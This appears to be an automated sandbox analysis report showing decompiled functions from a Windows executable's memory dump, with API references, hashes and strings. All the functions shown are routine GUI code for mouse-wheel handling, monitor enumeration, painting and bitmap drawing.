API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
String ID:
API String ID: 156109915-0
Opcode ID: d239b6d83fd5890e964fa995a5fe5e022103c071927bc4894de3fd2282d1dee1
Instruction ID: 213ea895912a70a8ca5a773c33adc9970a9189f77f50976c9854d6eb8ffa4e4d
Opcode Fuzzy Hash: d239b6d83fd5890e964fa995a5fe5e022103c071927bc4894de3fd2282d1dee1
Instruction Fuzzy Hash: 5F81E371E00608AFDB41DBA9C885EEEB7F9AF09304F1440A6F914F7291C779AE55CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004072C0, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072C0(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x004072c7
0x004072c9
0x004072cb
0x004072dd
0x004072ec
0x004072f8
0x00407304
0x00407309
0x00407328
0x0040730f
0x0040731f
0x0040731f
0x0040732d
0x0040734a
0x00407333
0x00407343
0x00407343
0x00407357

APIs

FindWindowA.USER32 ref: 004072D8
RegisterClipboardFormatA.USER32 ref: 004072E4
RegisterClipboardFormatA.USER32 ref: 004072F3
RegisterClipboardFormatA.USER32 ref: 004072FF
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407317
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 0040733B

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 004072EE
MSH_SCROLL_LINES_MSG, xrefs: 004072FA
MouseZ, xrefs: 004072D3
MSWHEEL_ROLLMSG, xrefs: 004072DF
Magellan MSWHEEL, xrefs: 004072CE

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: fc28f8cd1474f417419845a76e164ddcecbb7c8c0b41082bd873b79f9500c3e3
Instruction ID: 413e2d452572d236b9306eea21cdd9fe0401c02e22aa528b1d9c3d858248855a
Opcode Fuzzy Hash: fc28f8cd1474f417419845a76e164ddcecbb7c8c0b41082bd873b79f9500c3e3
Instruction Fuzzy Hash: 0D111F71A48305AFF314AF55CC41B66B7A8EF44710F204136FD84AB2C1D6B9BC41D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00426F50, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00426F50(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x48fac3 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x48fab0 = E004269A4(7, _t60,  *0x48fab0, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00426f59
0x00426f5c
0x00426f66
0x00426f96
0x00426f9c
0x00427058
0x00427060
0x00427060
0x00426fa4
0x00426fa9
0x00426fb4
0x00426fbf
0x00426fc4
0x0042702d
0x00427045
0x00427056
0x00427041
0x00427041
0x00427041
0x00000000
0x0042702d
0x00426fd0
0x00426fdf
0x00000000
0x00000000
0x00426ff1
0x00427009
0x0042701f
0x00000000
0x00000000
0x00427025
0x00427027
0x00427027
0x00000000
0x00000000
0x00000000
0x00000000
0x00427009
0x00426f7a
0x00426f8f
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426F89
GetSystemMetrics.USER32 ref: 00426FAE
GetSystemMetrics.USER32 ref: 00426FB9
GetClipBox.GDI32(?,?), ref: 00426FCB
GetDCOrgEx.GDI32(?,?), ref: 00426FD8
OffsetRect.USER32(?,?,?), ref: 00426FF1
IntersectRect.USER32 ref: 00427002
IntersectRect.USER32 ref: 00427018

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

EnumDisplayMonitors, xrefs: 00426F68

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 2a17fd8f221bdc6dc8a00e26504724b85d04c7ccb706610bbd9043dcf0a2c9b8
Instruction ID: ac9b69e9cf31da9c785e8c718e67a5221e2514bf759367680ce38615bb1666a6
Opcode Fuzzy Hash: 2a17fd8f221bdc6dc8a00e26504724b85d04c7ccb706610bbd9043dcf0a2c9b8
Instruction Fuzzy Hash: 64315E72B04159AFDB10DFA5D8459EF77BCAB05314F40453BFD19E3240EB3899088B69

Uniqueness

Uniqueness Score: -1.00%

Function 0043D5A0, Relevance: 16.6, APIs: 11, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043D5A0(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043C1F8(_t83) != 0) {
						_t38 = E0043D0C0(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00406E30();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406A58();
					_v12 = _t47;
					L00407090();
					L00406A60();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043F370(_t83),  &_v80);
					E00439EA4(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043D5A0(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43d6f2, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406A38();
					EndPaint(E0043F370(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43d6f9);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

0x0043d5a1
0x0043d5a3
0x0043d5a8
0x0043d5a9
0x0043d5ab
0x0043d5b4
0x0043d5c0
0x0043d5df
0x0043d5cd
0x0043d5d3
0x0043d5d3
0x0043d6ff
0x0043d5e9
0x0043d5eb
0x0043d5f9
0x0043d607
0x0043d60a
0x0043d60f
0x0043d614
0x0043d61a
0x0043d621
0x0043d626
0x0043d636
0x0043d644
0x0043d653
0x0043d668
0x0043d670
0x0043d677
0x0043d67e
0x0043d695
0x0043d6a3
0x0043d6a9
0x0043d6aa
0x0043d6ac
0x0043d6af
0x0043d6c0
0x0043d6c7
0x0043d6ca
0x0043d6cd
0x0043d6da
0x0043d6e3
0x0043d6f1
0x0043d6f1

APIs

72E7AC50.USER32(00000000), ref: 0043D5EB
72E7A520.GDI32(00000000,?), ref: 0043D60F
72E7B380.USER32(00000000,00000000,00000000,?), ref: 0043D61A
72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043D621
SelectObject.GDI32(00000000,?), ref: 0043D631
BeginPaint.USER32(00000000,?,00000000,0043D6F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D653
72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D6AF
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D6C0
SelectObject.GDI32(00000000,?), ref: 0043D6DA
DeleteDC.GDI32(00000000), ref: 0043D6E3
DeleteObject.GDI32(?), ref: 0043D6EC

Part of subcall function 0043D0C0: BeginPaint.USER32(00000000,?), ref: 0043D0E6
Part of subcall function 0043D0C0: EndPaint.USER32(00000000,?,0043D1E7), ref: 0043D1DA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
String ID:
API String ID: 3782911080-0
Opcode ID: 5a3e04c301e325c4972d0f2088609d59fa911dd45dc8f2a605fa39d648e073c2
Instruction ID: d66b789b3e3e0027213199f312dce475439fcebb8d8bdcc4f71af37a63feaf05
Opcode Fuzzy Hash: 5a3e04c301e325c4972d0f2088609d59fa911dd45dc8f2a605fa39d648e073c2
Instruction Fuzzy Hash: 94412F75B00204AFDB00EBA9CD85B9EB7F8AF4D704F10447AB50AEB281DA78ED058B54

Uniqueness

Uniqueness Score: -1.00%

Function 00436648, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00436648(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x436969
				_t113 = E00436A80( *_t2 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x48e6ec; // 0x48fbfc
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043F370(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x436969
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x436969
						_t106 =  *0x434e14; // 0x434e60
						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x436969
							_v32 = E0043F370( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E004365DC);
						_push(GetCurrentThreadId());
						L00406DB8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037B0(_t101, _t126);
						_t78 =  *0x48fb84; // 0x0
						_t110 =  *0x433bf0; // 0x433c3c
						if(E00403740(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x48fb84; // 0x0
						if(E0043F370( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043F370(_t116);
					goto L19;
				}
				_t117 = E00435BD0(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043F370(_t117);
					goto L6;
				}
			}

0x00436648
0x00436651
0x00436653
0x00436657
0x00436662
0x00436664
0x0043666a
0x0043666f
0x0043667a
0x004366a3
0x004366a7
0x004367d6
0x004367df
0x004367df
0x004366ad
0x004366b3
0x004366b3
0x004366b8
0x00000000
0x00000000
0x004366b1
0x004366b1
0x004366c1
0x004366c3
0x004366c9
0x00000000
0x00000000
0x004366cf
0x004366d5
0x004366da
0x004366f8
0x004366fe
0x00436709
0x0043670b
0x0043671d
0x0043671f
0x0043670d
0x0043670d
0x00436718
0x00436718
0x00436722
0x00436722
0x00436726
0x0043672c
0x00436732
0x00436738
0x00436739
0x00436743
0x00436744
0x00436749
0x0043674d
0x00000000
0x00000000
0x0043675b
0x00436766
0x0043676b
0x0043677b
0x00436780
0x00436785
0x00436792
0x004367bd
0x004367d0
0x004367d2
0x004367d2
0x00000000
0x004367d0
0x00436794
0x004367a3
0x00000000
0x00000000
0x004367a5
0x004367bb
0x00000000
0x00000000
0x00000000
0x004367bb
0x004366df
0x004366e5
0x004366e5
0x004366ea
0x00000000
0x00000000
0x004366e3
0x004366e3
0x004366f3
0x00000000
0x004366f3
0x00436684
0x00436688
0x00000000
0x0043668e
0x00436692
0x00436692
0x00436697
0x00000000
0x00000000
0x00436690
0x00436690
0x004366a0
0x00000000
0x004366a0

APIs

Part of subcall function 00436A80: WindowFromPoint.USER32(iiC,?,00000000,00436662,?,0048FB90,?), ref: 00436A86
Part of subcall function 00436A80: GetParent.USER32(00000000), ref: 00436A9D

GetWindow.USER32(00000000,00000004), ref: 0043666A
GetCurrentThreadId.KERNEL32 ref: 0043673E
72E7AC10.USER32(00000000,004365DC,?,00000000,00000004,?,0048FB90,?), ref: 00436744
GetWindowRect.USER32 ref: 0043675B
IntersectRect.USER32 ref: 004367C9

Part of subcall function 00435BD0: GlobalFindAtomA.KERNEL32 ref: 00435BE4
Part of subcall function 00435BD0: GetPropA.USER32 ref: 00435BFB

Strings

iiC, xrefs: 0043676F, 00436767, 00436760, 00436726
`NC, xrefs: 004366FE
iiC, xrefs: 00436657, 004366CF, 004366F8, 0043670D, 004366DC
<<C, xrefs: 00436785

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
String ID: <<C$`NC$iiC$iiC
API String ID: 2329882401-2473348307
Opcode ID: 818f554653b8c48333093537ea7485411cee3a854250aefd8b3a6c87ce74fcb1
Instruction ID: e7c90c1ee9c5e868b1f9d1e5ea8ed272ea7a67a8deef7f33a43d871a993f7ec4
Opcode Fuzzy Hash: 818f554653b8c48333093537ea7485411cee3a854250aefd8b3a6c87ce74fcb1
Instruction Fuzzy Hash: 8B51A071A0010AAFCB10DF69C581A9FB7E8BF08394F519166E814EB391D738ED048B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA28, Relevance: 15.2, APIs: 10, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FA28(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E0041FF00(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41fcce, _t221);
					_t204 =  *0x41fce0; // 0x9
					E00420318(_v8, __ecx, _t204);
					E0041FF00(E004246E8(_v12));
					_push(_t221);
					_push(0x41fca9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E004247D4(_v12, _t198) != _a4) {
						_v40 = E00424120(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424948(_v40, _a4, __eflags);
						_t116 = E004246E8(_v40);
						_t208 =  *0x41fce4; // 0x1
						E00420318(_t116,  *_v40, _t208);
						_v36 =  *((intOrPtr*)(E004246E8(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406A60();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x41fc87);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_t124 = E004246E8(_v12);
					_t209 =  *0x41fce4; // 0x1
					E00420318(_t124, _t198, _t209);
					if(E0041F8CC( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E004246E8(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E004207E0( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E004246E8(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(E0041FC8E);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035B4(_v40);
					}
				}
				return __eax;
			}

0x0041fa28
0x0041fa29
0x0041fa2b
0x0041fa31
0x0041fa34
0x0041fa36
0x0041fa39
0x0041fa40
0x0041fa49
0x0041fa59
0x0041fa61
0x0041fa64
0x0041fa6d
0x0041fa7a
0x0041fa81
0x0041fa82
0x0041fa87
0x0041fa8a
0x0041fa92
0x0041fa9b
0x0041faa1
0x0041faa9
0x0041fab7
0x0041faf1
0x0041fafa
0x0041fafc
0x0041fb05
0x0041fb0d
0x0041fb12
0x0041fb18
0x0041fb28
0x0041fb2b
0x0041fb2d
0x0041fab9
0x0041fabb
0x0041fac3
0x0041fac6
0x0041fac9
0x0041facb
0x0041fad0
0x0041fae0
0x0041fae0
0x0041fb32
0x0041fb33
0x0041fb38
0x0041fb3b
0x0041fb41
0x0041fb46
0x0041fb4c
0x0041fb5e
0x0041fbd3
0x0041fbe6
0x0041fbfa
0x0041fc28
0x0041fc38
0x0041fc48
0x0041fb60
0x0041fb96
0x0041fb96
0x0041fc4f
0x0041fc52
0x0041fc55
0x0041fc5e
0x0041fc6a
0x0041fc6e
0x0041fc78
0x0041fc78
0x00000000
0x0041fc60
0x00000000
0x0041fc63
0x0041fc5e
0x0041fcdb

APIs

Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF08
Part of subcall function 0041FF00: RtlLeaveCriticalSection.KERNEL32(0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF15
Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(00000038,0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF1E

72E7A590.GDI32(00000000), ref: 0041FACB
SelectObject.GDI32(?,?), ref: 0041FADB
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041FBD3
SetTextColor.GDI32(?,00000000), ref: 0041FBE1
SetBkColor.GDI32(?,00FFFFFF), ref: 0041FBF5
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041FC28
SetTextColor.GDI32(?,?), ref: 0041FC38
SetBkColor.GDI32(?,?), ref: 0041FC48
SelectObject.GDI32(?,00000000), ref: 0041FC78
DeleteDC.GDI32(?), ref: 0041FC81

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
String ID:
API String ID: 2975480410-0
Opcode ID: 1ba593eafb9bc19b7501eee1763ea427e2a5d4d69858e207fa99d0f769cba00e
Instruction ID: 1647ed3346f09fa24bcdcb9f451b8a29068df62194e39d8e16280e0f95064956
Opcode Fuzzy Hash: 1ba593eafb9bc19b7501eee1763ea427e2a5d4d69858e207fa99d0f769cba00e
Instruction Fuzzy Hash: 1891C675A00118AFCB40EFA9C985E9EBBF8FF0D304B5544A6F908E7251D638ED41DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0043D21C, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043D21C(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004140D0( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EB0C(0x80000010));
							E00412AB0( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EB0C(0x80000014));
							E00412AB0( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E0041412C(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
